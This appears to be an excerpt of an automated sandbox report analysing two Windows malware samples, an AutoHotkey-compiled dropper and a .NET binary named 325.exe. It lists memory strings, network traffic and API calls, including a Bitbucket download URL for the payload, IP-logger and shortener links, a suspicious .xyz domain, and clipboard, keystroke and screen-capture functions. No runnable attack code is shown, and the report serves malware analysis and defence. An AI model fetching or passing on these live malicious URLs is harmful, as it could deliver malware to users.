Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://yspasenana.xyz
Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://yspasenana.xyz/
Source: 325.exe, 0000000E.00000002.363745282.0000000002CC3000.00000004.00000001.sdmp	String found in binary or memory: http://yspasenana.xyz4
Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://yspasenana.xyz:80/
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb
Source: 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com
Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/c6138a8d-6b23-4fcf-ac63-5ded44dfc386/downloads/cf4ea471-f159-
Source: kS2dqbsDwD.exe, 00000000.00000002.307255166.0000000000943000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/is.gd
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000003.304898256.00000000008FA000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/325.exe
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/325.exelq
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp	String found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: https://get.adob
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: https://helpx.ad
Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/
Source: kS2dqbsDwD.exe, kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp	String found in binary or memory: https://iplogger.org/1Spbs7
Source: kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/1Spbs7%A_AppData%
Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/1Spbs7e
Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/y
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/b
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp	String found in binary or memory: https://is.gd/nKi5S3
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/nKi5S3$
Source: kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/nKi5S3%A_AppData%
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/nKi5S3H
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363595455.0000000002BEF000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363606561.0000000002BF3000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: kS2dqbsDwD.exe	String found in binary or memory: https://sectigo.com/CPS0C
Source: kS2dqbsDwD.exe	String found in binary or memory: https://sectigo.com/CPS0D
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.3:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.201.169:443 -> 192.168.2.3:49715 version: TLS 1.2

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_00000001400053A0 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard,

0_2_00000001400053A0

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_0000000140005280 GetClipboardFormatNameW,GetClipboardData,

0_2_0000000140005280

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_0000000140042E80 GetSystemMetrics,GetSystemMetrics,GetDC,DestroyCursor,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,

0_2_0000000140042E80

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_0000000140011052 GetKeyboardState,

0_2_0000000140011052

Source: 325.exe, 00000002.00000002.303820429.0000000000B58000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_00000001400018BA GlobalUnWire,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,GetKeyState,GetKeyState,GetKeyState,IsDlgButtonChecked,IsDlgButtonChecked,PostMessageW,IsDlgButtonChecked,IsDlgButtonChecked,IsDialogMessageW,GetTickCount,KillTimer,ShowWindow,GetTickCount,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,SetCurrentDirectoryW,ShowWindow,DragQueryFileW,DragFinish,DragFinish,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CountClipboardFormats,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsDlgButtonChecked,ScreenToClient,IsDlgButtonChecked,IsDlgButtonChecked,GetWindowRect,MulDiv,MulDiv,GetWindowRect,GetWindowRect,GetWindowLongW,SetWindowLongW,MulDiv,MulDiv,IsDlgButtonChecked,ShowWindow,DragFinish,GetWindowLongW,SetWindowLongW,

0_2_00000001400018BA

System Summary:

.NET source code contains very large strings

Show sources

Source: 325.exe.0.dr, uNotepad/CollectionToSort.cs	Long String: Length: 32771
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.cs	Long String: Length: 32771
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.cs	Long String: Length: 32771
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionToSort.cs	Long String: Length: 32771

Sample or dropped binary is a compiled AutoHotkey binary

Show sources

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Window found: window name: AutoHotkey

Jump to behavior

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140043AD0 RegisterClipboardFormatW,MoveWindow,GetSysColor,SetBkColor,SetTextColor,GetSysColorBrush,CreateCompatibleDC,SelectObject,BitBlt,SelectObject,DeleteDC,DrawIconEx,ExcludeClipRect,CreateRectRgn,GetClipRgn,GetSysColorBrush,FillRgn,DeleteObject,GetClipBox,FillRect,GetClientRect,MoveWindow,MoveWindow,MoveWindow,InvalidateRect,ShowWindow,GetMenu,CheckMenuItem,NtdllDefWindowProc_W,SendMessageTimeoutW,PostMessageW,PostMessageW,SendMessageTimeoutW,	0_2_0000000140043AD0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004438A NtdllDefWindowProc_W,PostMessageW,	0_2_000000014004438A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140043BF6 NtdllDefWindowProc_W,	0_2_0000000140043BF6
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140043C50 NtdllDefWindowProc_W,	0_2_0000000140043C50
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140043C8B SetFocus,NtdllDefWindowProc_W,	0_2_0000000140043C8B
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140043CAC NtdllDefWindowProc_W,	0_2_0000000140043CAC
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140043CD9 NtdllDefWindowProc_W,	0_2_0000000140043CD9

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_00000001400492B0: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00000001400492B0

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_00000001400624E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

0_2_00000001400624E0

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095EB07	0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095EB07	0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095EB07	0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095EB07	0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095EB07	0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095EB07	0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095EB07	0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095EB07	0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095EB07	0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140019030	0_2_0000000140019030
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140060290	0_2_0000000140060290
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400184C0	0_2_00000001400184C0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140004530	0_2_0000000140004530
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400018BA	0_2_00000001400018BA
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140043AD0	0_2_0000000140043AD0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140036D50	0_2_0000000140036D50
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140014FF0	0_2_0000000140014FF0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400A7FF8	0_2_00000001400A7FF8
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140049040	0_2_0000000140049040
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140053050	0_2_0000000140053050
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D080	0_2_000000014004D080
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140008140	0_2_0000000140008140
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140083150	0_2_0000000140083150
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400861F0	0_2_00000001400861F0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014003C220	0_2_000000014003C220
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140042240	0_2_0000000140042240
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014002B25C	0_2_000000014002B25C
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014000C260	0_2_000000014000C260
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140048270	0_2_0000000140048270
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004B270	0_2_000000014004B270
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014008B280	0_2_000000014008B280
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014000A2B0	0_2_000000014000A2B0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400222C0	0_2_00000001400222C0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400132C0	0_2_00000001400132C0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004C2D0	0_2_000000014004C2D0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400302E0	0_2_00000001400302E0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014000F2E0	0_2_000000014000F2E0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014003A300	0_2_000000014003A300
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140020316	0_2_0000000140020316
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014005E330	0_2_000000014005E330
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014003B32A	0_2_000000014003B32A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014006C33D	0_2_000000014006C33D
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140033380	0_2_0000000140033380
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140096390	0_2_0000000140096390
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400563A0	0_2_00000001400563A0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400883F0	0_2_00000001400883F0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400B9420	0_2_00000001400B9420
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004A480	0_2_000000014004A480
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400424B0	0_2_00000001400424B0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400414B0	0_2_00000001400414B0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400B04B4	0_2_00000001400B04B4
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400344D0	0_2_00000001400344D0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140059510	0_2_0000000140059510
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014005E580	0_2_000000014005E580
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014002D585	0_2_000000014002D585
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014001D5A9	0_2_000000014001D5A9
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400695C0	0_2_00000001400695C0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400465D0	0_2_00000001400465D0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400665E0	0_2_00000001400665E0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140023630	0_2_0000000140023630
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140058650	0_2_0000000140058650
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014003B654	0_2_000000014003B654
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400AE660	0_2_00000001400AE660
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014006D6A0	0_2_000000014006D6A0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400C2698	0_2_00000001400C2698
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400C26B0	0_2_00000001400C26B0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400C26A8	0_2_00000001400C26A8
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400096E0	0_2_00000001400096E0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140056719	0_2_0000000140056719
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400577A0	0_2_00000001400577A0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400727F0	0_2_00000001400727F0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140054860	0_2_0000000140054860
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014005E8F0	0_2_000000014005E8F0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140030910	0_2_0000000140030910
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014006C920	0_2_000000014006C920
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140006938	0_2_0000000140006938
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014000693C	0_2_000000014000693C
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140006940	0_2_0000000140006940
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D990	0_2_000000014004D990
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400059D0	0_2_00000001400059D0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014005F9F2	0_2_000000014005F9F2
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140071A10	0_2_0000000140071A10
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140019A2E	0_2_0000000140019A2E
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400BBA40	0_2_00000001400BBA40
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140047AB0	0_2_0000000140047AB0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140060AF0	0_2_0000000140060AF0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140049B40	0_2_0000000140049B40
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400B7B9C	0_2_00000001400B7B9C
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014002FBFC	0_2_000000014002FBFC
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140059C00	0_2_0000000140059C00
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140055C10	0_2_0000000140055C10
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014000CC10	0_2_000000014000CC10
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014005FC25	0_2_000000014005FC25
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140038C50	0_2_0000000140038C50
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004BC60	0_2_000000014004BC60
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400BDCA8	0_2_00000001400BDCA8
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014008BCD0	0_2_000000014008BCD0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140041CD1	0_2_0000000140041CD1
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140045CF0	0_2_0000000140045CF0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400A7D2C	0_2_00000001400A7D2C
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004FD30	0_2_000000014004FD30
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014003ED70	0_2_000000014003ED70
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140079D90	0_2_0000000140079D90
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140065D90	0_2_0000000140065D90
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400A0DC0	0_2_00000001400A0DC0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014002ADE6	0_2_000000014002ADE6
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140035E60	0_2_0000000140035E60
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140090E70	0_2_0000000140090E70
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140067E62	0_2_0000000140067E62
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140051E80	0_2_0000000140051E80
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140042E80	0_2_0000000140042E80
